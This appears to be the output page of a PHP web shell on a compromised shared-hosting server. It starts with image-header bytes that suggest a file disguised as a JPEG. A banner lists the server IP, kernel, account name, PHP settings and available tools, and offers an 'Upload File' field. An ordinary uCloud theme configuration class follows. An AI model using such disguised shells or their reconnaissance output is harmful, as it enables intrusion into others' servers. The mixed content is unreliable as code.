����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.22.77.171 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/ideyshare.name.ng/ner2/ucloud/themes/evolution/ |
Upload File : |
<?php namespace Themes\Evolution; use App\Services\ThemeConfig AS CoreThemeConfig; class ThemeConfig extends CoreThemeConfig { /** * Setup the theme config. * * @var array */ public $config = array( 'theme_name' => 'Evolution Theme', 'folder_name' => 'evolution', 'theme_description' => 'Bootstrap uCloud theme included with the core script.', 'author_name' => 'uCloud', 'author_website' => 'https://mfscripts.com', 'theme_version' => '1.0', 'required_script_version' => '5.0', 'product' => 'cloudable', 'product_name' => 'uCloud', 'product_url' => 'https://mfscripts.com/ucloud', ); }